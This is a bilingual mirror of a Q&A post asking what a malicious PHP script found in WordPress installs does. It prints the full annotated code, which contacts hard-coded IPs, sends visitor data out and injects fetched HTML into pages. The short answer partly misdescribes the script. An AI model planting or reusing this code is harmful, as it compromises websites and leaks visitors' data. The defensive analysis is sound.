在 WordPress 安装中发现的这个恶意 PHP 代码有什么作用? [英] What does this malicious PHP code found in a WordPress install do?


问题描述

我能够解码我在一些 WordPress 文件中找到的以下 PHP 脚本.只是出于好奇,有人能告诉我这段代码实际上做了什么吗?看起来它已以某种方式复制到同一服务器上的其他 WordPress 安装.

I was able to decode the following PHP script which I found within some WordPress files. Just out of curiosity, can someone tell me what this code actually does? It looks like it has been somehow replicated to other WordPress installs on the same server.

<?php 
// Analyst annotation (defender's view): this listing is an injected PHP snippet
// recovered from a compromised WordPress install. The comments describe what each
// part observably does and what to look for when cleaning up; the code itself is
// left byte-for-byte as found so it can be matched against other infected files.

// Silences every warning/notice. Several calls below would otherwise emit
// warnings (failed fopen, undefined variables, suppressed @-calls), so nothing
// about this code's failures reaches the web server log.
error_reporting(0);

// Everything that follows is wrapped in a function_exists() guard. The visible
// effect is that if the same snippet has been injected into several files loaded
// on one request, only the first copy defines the functions and registers the
// output buffer; later copies are no-ops instead of "cannot redeclare" fatals.
// This brace is closed on the last line of the script.
if (!function_exists("ZM5j2q0shf_pirogok")){
// Sentinel function: its only role in this file is to exist, so the
// function_exists() check above can detect that the snippet is already loaded.
// It always returns false and is never called anywhere in the listing.
// Detection: the unusual prefix "ZM5j2q0shf_" is a useful string to grep for
// across the web root and other installs on the same host.
function ZM5j2q0shf_pirogok(){
return false;
}

if (!function_exists("Uno_decode")){
/**
 * Decodes one line of the on-disk control file (see get_true_name()).
 *
 * Steps visible in the code:
 *   1. base64-decode the input;
 *   2. build a keystream ($Gamma) at least as long as the decoded input by
 *      repeatedly taking sha1($Gamma . $Seq . $Salt), converting the hex digest
 *      to raw bytes with pack("H*") and appending its first 8 bytes;
 *   3. XOR the decoded input with that keystream.
 * PHP's string XOR operates on the shorter operand's length, so the extra
 * keystream bytes are simply discarded.
 *
 * $Salt and $Seq are hard-coded constants, i.e. the obfuscation carries no
 * secret; the same two strings can be used to recognise this malware family.
 *
 * @param string $String base64 text as read from the control file
 * @return string the XOR-decoded bytes
 */
function Uno_decode($String)
{
    $String = base64_decode($String);
    $Salt="dc5p9dOpBc";
    $StrLen = strlen($String);
    $Seq = "DMEf5HZuPq";
    $Gamma = "";
    while (strlen($Gamma)<$StrLen)
    {
        $Seq = pack("H*",sha1($Gamma.$Seq.$Salt));
        $Gamma.=substr($Seq,0,8);
    }

    return $String^$Gamma;
}
}

if (!function_exists("get_t_dir_mass")){
/**
 * Collects every writable directory the script can find to stash its control file.
 *
 * Candidates, in order: sys_get_temp_dir(), $_ENV TMP/TMPDIR/TEMP, the directory
 * tempnam() lands in (a probe file is created and immediately unlinked), the
 * upload_tmp_dir ini setting, the session save path, and finally the directory
 * of this script itself. Each is added only if is_writeable() succeeds.
 *
 * Cleanup note: the control file named by get_true_name() may therefore sit in
 * ANY of these locations, not just /tmp — check all of them, including the
 * plugin/theme directory the injected file lives in.
 *
 * NOTE(review): $res is never initialised; if no candidate is writable,
 * array_unique() receives null (a warning, hidden by error_reporting(0)).
 *
 * @return array<int, string> de-duplicated list of writable directory paths
 */
function get_t_dir_mass() {

if (function_exists("sys_get_temp_dir")) {
    if (@is_writeable(sys_get_temp_dir())) { $res[] = realpath(sys_get_temp_dir()); }
}
    if (!empty($_ENV["TMP"]) && @is_writeable(realpath($_ENV["TMP"]))) { $res[] = realpath($_ENV["TMP"]); }
    if (!empty($_ENV["TMPDIR"]) && @is_writeable(realpath($_ENV["TMPDIR"]))) { $res[] = realpath( $_ENV["TMPDIR"]); }
    if (!empty($_ENV["TEMP"]) && @is_writeable(realpath($_ENV["TEMP"]))) { $res[] = realpath( $_ENV["TEMP"]); }
    // Probe: tempnam() with an empty prefix creates a zero-byte file, which is
    // deleted right away; only its parent directory is kept as a candidate.
    $tempfile=@tempnam(__FILE__,"");
    if (@file_exists($tempfile)) {
      @unlink($tempfile);
    if (@is_writeable(realpath(dirname($tempfile)))) {$res[] = realpath(dirname($tempfile)); }

    }
    if (@is_writeable(realpath(@ini_get("upload_tmp_dir")))) { $res[] = realpath(@ini_get("upload_tmp_dir")); }
    if (@is_writeable(realpath(session_save_path()))) {$res[] = realpath(session_save_path()); }
    if (@is_writeable(realpath(dirname(__FILE__)))) { $res[] = realpath(dirname(__FILE__)); }

    return array_unique($res);
}
}

if (!function_exists("get_ua")){
/**
 * Returns the list of User-Agent substrings that trigger the injection.
 *
 * Reads the control file (get_true_name()) from every directory returned by
 * get_t_dir_mass(), passes each line through Uno_decode(), and treats lines
 * that contain NO "." as a "|"-separated list of UA fragments. (Lines with a
 * "." are IP addresses and are handled by get_know_ip() instead.)
 *
 * If the file yields nothing, the built-in defaults are "msie", "firefox" and
 * "googlebot". Because the injection at the bottom of the script only fires
 * when the visitor's lowercased UA contains one of these fragments, an
 * administrator testing from a browser that matches none of them may never
 * see the injected content — verify with a matching UA or by reading the file.
 *
 * NOTE(review): $know is never initialised. On PHP 8, count() of an undefined
 * (null) variable throws a TypeError, so this function presumably fatals on
 * modern PHP before the defaults are added — confirm on the affected version.
 *
 * @return array<int, string> de-duplicated UA fragments
 */
function get_ua(){
$name = get_true_name();

foreach(get_t_dir_mass() as $t){
if(file_exists($t.DIRECTORY_SEPARATOR.$name)){
foreach (file($t.DIRECTORY_SEPARATOR.$name) as $tt){
$tt = Uno_decode($tt);
if(strpos($tt,".") === false){
$tmp = explode("|",$tt);
foreach($tmp as $u){
$know[] = trim($u);
}
}
}
}
}
if(count($know) == 0){
$know[] = "msie";
$know[] = "firefox";
$know[] = "googlebot";
}
return array_unique($know);
}
}

if (!function_exists("get_true_name")){
/**
 * Name of the hidden control file this malware reads and writes.
 *
 * Indicator of compromise: a file named ".backup_time" in any directory listed
 * by get_t_dir_mass() (system temp, upload_tmp_dir, session path, the script's
 * own directory). The leading dot hides it from a plain `ls`. Remove it together
 * with the injected PHP, otherwise a re-infection keeps its learned IP/UA lists.
 *
 * @return string
 */
function get_true_name(){
return ".backup_time";
}
}

if (!function_exists("strposa")){
/**
 * strpos() over several needles: true if ANY needle occurs in $haystack.
 *
 * Used below to test the visitor's User-Agent against the fragment list from
 * get_ua(); a scalar $needle is wrapped into a one-element array first.
 *
 * @param string          $haystack
 * @param string|string[] $needle
 * @param int             $offset   passed straight through to strpos()
 * @return bool
 */
function strposa($haystack, $needle, $offset=0) {
    if(!is_array($needle)) $needle = array($needle);
    foreach($needle as $query) {
        if(strpos($haystack, $query, $offset) !== false) return true;
    }
    return false;
}
}

// Gate: the rest of the script (all remaining function definitions and the
// ob_start() call) is only compiled in when the request carries a User-Agent
// that contains one of the fragments from get_ua(). Requests from other clients
// pass through untouched, which is why the injection is easy to miss when
// inspecting the site with an arbitrary browser. These two braces are closed
// just after the ob_start() call at the end of the script.
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);

$true_ua = get_ua();

if (strposa($ua,$true_ua)){

if (!function_exists("t_dir")){
/**
 * Returns the FIRST writable temp directory, or null if none is found.
 *
 * Same candidate list and order as get_t_dir_mass(), but returns on the first
 * hit instead of collecting all of them. Only used by ZM5j2q0shf_callback() to
 * place a scratch file while re-compressing a gzip-encoded response.
 *
 * @return string|null
 */
function t_dir() {
if (function_exists("sys_get_temp_dir")) {
    if (@is_writeable(sys_get_temp_dir())) { return realpath(sys_get_temp_dir()); }
}
    if (!empty($_ENV["TMP"]) && @is_writeable(realpath($_ENV["TMP"]))) { return realpath($_ENV["TMP"]); }
    if (!empty($_ENV["TMPDIR"]) && @is_writeable(realpath($_ENV["TMPDIR"]))) { return realpath( $_ENV["TMPDIR"]); }
    if (!empty($_ENV["TEMP"]) && @is_writeable(realpath($_ENV["TEMP"]))) { return realpath( $_ENV["TEMP"]); }
    $tempfile=@tempnam(__FILE__,"");
    if (@file_exists($tempfile)) {
      @unlink($tempfile);
    if (@is_writeable(realpath(dirname($tempfile)))) {return realpath(dirname($tempfile)); }

    }
    if (@is_writeable(realpath(@ini_get("upload_tmp_dir")))) { return realpath(@ini_get("upload_tmp_dir")); }
    if (@is_writeable(realpath(session_save_path()))) { return realpath(session_save_path()); }
    if (@is_writeable(realpath(dirname(__FILE__)))) { return realpath(dirname(__FILE__)); }
    return null;
}
}

if (!function_exists("get_know_ip")){
/**
 * Returns the list of remote hosts the injected content is fetched from.
 *
 * Starts with four hard-coded IPv4 addresses and appends every Uno_decode()d
 * line of the control file that contains a "." (get_ua() takes the others).
 *
 * Network indicators: outbound HTTP (port 80) from the web server to
 * 151.236.14.86, 149.154.157.133, 37.235.54.48 or 31.215.205.196, plus any
 * address learned later via save_know_ip(). Blocking/alerting on egress to
 * these from the web tier is a reasonable containment step; note the learned
 * list means the set of hosts can change after infection.
 *
 * @return array<int, string> de-duplicated IP strings
 */
function get_know_ip(){
$know[] = "151.236.14.86";
$know[] = "149.154.157.133";
$know[] = "37.235.54.48";
$know[] = "31.215.205.196";

$name = get_true_name();

foreach(get_t_dir_mass() as $t){
if(file_exists($t.DIRECTORY_SEPARATOR.$name)){
foreach (file($t.DIRECTORY_SEPARATOR.$name) as $tt){
$tt = Uno_decode($tt);
if(strpos($tt,".")>0){
$know[] = trim($tt);
}
}
}
}
return array_unique($know);
}
}

if (!function_exists("save_know_ip")){
/**
 * Overwrites the control file in EVERY writable temp directory with the given
 * host list, one entry per line (PHP_EOL), replacing whatever was there.
 *
 * Observations for the analyst:
 *  - the list is written as-is, although get_ua()/get_know_ip() pass each line
 *    through Uno_decode() when reading it back — whether the caller supplies
 *    already-encoded lines cannot be told from this file;
 *  - fopen() is not checked, so an unwritable path fails silently under
 *    error_reporting(0);
 *  - because the file is written to all candidate directories, cleanup must
 *    remove every copy, not just the first one found.
 *
 * @param string[] $ip lines to persist
 * @return void
 */
function save_know_ip($ip){
$name = get_true_name();
$content =  implode(PHP_EOL, $ip);
foreach(get_t_dir_mass() as $t){
$f = fopen($t.DIRECTORY_SEPARATOR.$name,"w");
fputs($f,$content);
fclose($f);
}
}
}

if (!function_exists("ZM5j2q0shf_get_real_ip")){
/**
 * Best-effort visitor IP, taken from a long list of proxy/forwarding headers
 * before falling back to REMOTE_ADDR.
 *
 * For each header: if its value is a bare dotted-quad IPv4 address it is
 * returned immediately; otherwise a comma-separated list is meant to be split
 * and its first element (minus any ":port" suffix) tested the same way.
 * The value is only used to report the visitor to the remote host in
 * ZM5j2q0shf_samui_get_links(); together with the UA, referer and URL this is
 * the per-visitor data the malware sends off-site.
 *
 * NOTE(review): stristr(",", $_SERVER[...]) has haystack and needle reversed
 * (it asks whether the header value occurs inside ","), so the comma-list
 * branch presumably almost never runs; and array_shift(explode(...)) passes a
 * temporary by reference, which PHP reports as a notice (hidden here).
 *
 * @return string
 */
function ZM5j2q0shf_get_real_ip() {
$proxy_headers = array("CLIENT_IP","FORWARDED","FORWARDED_FOR","FORWARDED_FOR_IP","HTTP_CLIENT_IP","HTTP_FORWARDED","HTTP_FORWARDED_FOR","HTTP_FORWARDED_FOR_IP", "HTTP_PC_REMOTE_ADDR","HTTP_PROXY_CONNECTION","HTTP_VIA", "HTTP_X_FORWARDED", "HTTP_X_FORWARDED_FOR", "HTTP_X_FORWARDED_FOR_IP","HTTP_X_IMFORWARDS","HTTP_XROXY_CONNECTION","VIA", "X_FORWARDED", "X_FORWARDED_FOR");
foreach($proxy_headers as $proxy_header)
{
if(isset($_SERVER[$proxy_header]) && preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $_SERVER[$proxy_header])){return $_SERVER[$proxy_header];}
else if(stristr(",", $_SERVER[$proxy_header]) !== FALSE)
{$proxy_header_temp = trim(array_shift(explode(",", $_SERVER[$proxy_header]))); 
if(($pos_temp = stripos($proxy_header_temp, ":")) !== FALSE) $proxy_header_temp = substr($proxy_header_temp, 0, $pos_temp); 
if(preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $proxy_header_temp) )return $proxy_header_temp;
}
}
return $_SERVER["REMOTE_ADDR"];
}
}

if (!function_exists("ZM5j2q0shf_get_url")){
/**
 * Reconstructs the requested page URL ("http://" + Host header + request URI)
 * with any query string stripped. Reported to the remote host as the "url="
 * parameter, so the operator learns which pages on the site are being served.
 *
 * @return string
 */
function ZM5j2q0shf_get_url(){ 
$url = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
if (strpos($url,"?") !== false){
$url = substr($url,0,strpos($url,"?"));
}
return $url;
}
}


if (!function_exists("ZM5j2q0shf_get_contents")){
/**
 * Fetches http://$ip/$page over plain HTTP and returns the trimmed body.
 *
 * Three transports are tried so the fetch works on most hosting setups:
 * cURL (3 s timeout), file_get_contents() when allow_url_fopen is on, and
 * finally a raw fsockopen() to port 80 with a hand-written HTTP/1.0 GET
 * (30 s connect timeout; the body is everything after the first blank line).
 *
 * Detection: this is the only network egress in the file. Outbound HTTP from
 * PHP worker processes to the addresses in get_know_ip(), or a PHP-originated
 * request whose path starts with "/ml.php", is the thing to alert on; the
 * fallback paths mean disabling cURL or allow_url_fopen alone does not stop it.
 *
 * NOTE(review): when fsockopen() fails, $ult is never assigned and the
 * function returns null.
 *
 * @param string $ip   remote host (IP string)
 * @param string $page request path, already starting with "/"
 * @return string|null response body, or null on total failure
 */
function ZM5j2q0shf_get_contents($ip, $page){
if((function_exists("curl_init")) && (function_exists("curl_exec"))){
    $ch = curl_init("http://" .$ip . "/" .$page);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 3);
    $ult = trim(curl_exec($ch));
    return $ult;
    }

if (ini_get("allow_url_fopen")) {
    $ult = trim(@file_get_contents("http://" .$ip . "/" .$page));
    return $ult;
    }
    $fp = fsockopen($ip, 80, $errno, $errstr, 30);
    if ($fp) {$out = "GET $page HTTP/1.0\r\n";
    $out .= "Host: $ip\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);
    $ret = "";
    while (!feof($fp)) {$ret  .=  fgets($fp, 128);}
fclose($fp);
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));}
return $ult;
}
}

if (!function_exists("ZM5j2q0shf_samui_get_links")){
/**
 * Contacts the remote hosts and returns the HTML that will be injected.
 *
 * Builds a request path "/ml.php?mother=mycompany.com&cr=1&aid=1001&url=...
 * &ip=...&ua=...&cod=...&ref=..." carrying the page URL, the visitor's IP,
 * lowercased User-Agent and Referer, and a nonce $cod = md5(url . time()).
 * The host list from get_know_ip() is shuffled and tried in turn.
 *
 * A reply is accepted only if it contains $check = md5($cod) — a simple
 * response-authentication tag, which is why the nonce is sent in the query:
 *   - the text BEFORE the tag is taken as an updated host list, split on "\n"
 *     and persisted with save_know_ip() (this is how the C2 host set rotates);
 *   - the text AFTER the tag (offset +32 = the length of an md5 hex string)
 *     is returned as the HTML to inject.
 * If no host answers with a valid tag the function falls off the end and
 * returns null, and nothing is injected for that request.
 *
 * Privacy/compliance note: visitor IP, UA, referer and URL are disclosed to a
 * third party on every matching request.
 *
 * NOTE(review): $ua is assigned twice; the first value is overwritten before use.
 *
 * @return string|null
 */
function ZM5j2q0shf_samui_get_links(){

$all = get_know_ip();
shuffle($all);
$url = ZM5j2q0shf_get_url();
$real_ip = ZM5j2q0shf_get_real_ip();
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
$aid = "1001";
$cod = md5($url.time());
$check = md5($cod);
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
$ref = urlencode(strtolower($_SERVER["HTTP_REFERER"]));
$page = "/ml.php?mother=mycompany.com&cr=1&aid=".$aid."&url=".$url."&ip=".$real_ip."&ua=".$ua."&cod=".$cod."&ref=".$ref;

foreach ($all as $ip){
$tc = ZM5j2q0shf_get_contents(trim($ip),$page);
$pos = strpos($tc, $check);
if ($pos !== false){
$proxy_list = substr($tc,0,$pos);

save_know_ip(explode("\n",$proxy_list));


$links = substr($tc,$pos+32);
return $links;
}
}
}
}

if (!function_exists("ZM5j2q0shf_mod_con")){
/**
 * Inserts the fetched HTML immediately after the first opening <body ...> tag.
 *
 * Content without "<body" is returned unchanged, so non-HTML responses (JSON,
 * feeds, assets served through PHP) are not modified. The replacement is
 * limited to one occurrence.
 *
 * NOTE(review): the replacement is a double-quoted PHP string, in which "\1"
 * is an octal escape (byte 0x01), not a backreference. The rewritten tag is
 * therefore presumably "<body" + chr(1) + ">" — the original body attributes
 * are dropped and a 0x01 control byte is emitted. That stray byte right after
 * "<body" in served pages is a handy artefact to grep for in proxy logs or
 * saved page sources — confirm on a live sample.
 *
 * @param string $con full response body
 * @return string
 */
function ZM5j2q0shf_mod_con($con){
if (strpos($con,"<body") !== false) {
$text = preg_replace("/<body(\s[^>]*)?>/i", "<body\1>".ZM5j2q0shf_samui_get_links(), $con,1);  
return $text;
} else {return $con;}
}
}


if (!function_exists("ZM5j2q0shf_callback")){
/**
 * Output-buffer callback: rewrites the finished page before it is sent.
 *
 * If headers have already gone out and one of them is exactly
 * "Content-Encoding: gzip", the buffer is assumed to be gzip data: it is
 * written to a scratch file (tempnam(t_dir(), "FOO")), read back through
 * gzopen()/gzread() (up to 10,000,000 bytes), passed to ZM5j2q0shf_mod_con(),
 * the scratch file is unlinked and the result is gzencode()d again. In every
 * other case the buffer goes straight to ZM5j2q0shf_mod_con().
 *
 * Forensics: a leftover file with the "FOO" prefix in a temp directory may
 * indicate a request that aborted between tempnam() and unlink() — worth
 * checking timestamps against access logs.
 *
 * @param string $buf the buffered output
 * @return string the (possibly modified) output
 */
function ZM5j2q0shf_callback($buf){
if (headers_sent()){
if (in_array("Content-Encoding: gzip", headers_list())){
$tmpfname = tempnam(t_dir(), "FOO");$zf = fopen($tmpfname, "w"); fputs($zf, $buf); fclose($zf); $zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = ZM5j2q0shf_mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);} else {$contents = ZM5j2q0shf_mod_con($buf); }} else {$contents = ZM5j2q0shf_mod_con($buf);}return($contents);
}
}

// Arms the whole thing: from here on every byte the request emits is buffered
// and handed to ZM5j2q0shf_callback() before delivery, which is where the
// fetched HTML is spliced in. No function above does anything by itself; if
// the injected file is included early (e.g. from a plugin or wp-config-level
// include, as the "replicated across installs" report suggests) every page
// served by that install is affected for matching User-Agents.
ob_start("ZM5j2q0shf_callback");

// Closes, in order: the strposa() UA-match gate, the isset(HTTP_USER_AGENT)
// gate, and the outermost function_exists("ZM5j2q0shf_pirogok") guard.
}
}
}

?>

推荐答案

它会通过已知的父 IP 下载压缩的有效负载并将其存储到您的临时目录之一.然后根据有效负载将 HTML 注入到您的 HTML 页面顶部,就在 <body> 下方.它还会检查可用于下载更多要注入的恶意代码的新 IP.

It goes to known parent IPs to download a zipped payload and stores it in one of your temp directories. It then injects HTML, depending on the payload, into the top of your HTML page just below <body>. It also checks for new IPs that can be used to download more bad-guy code to inject.

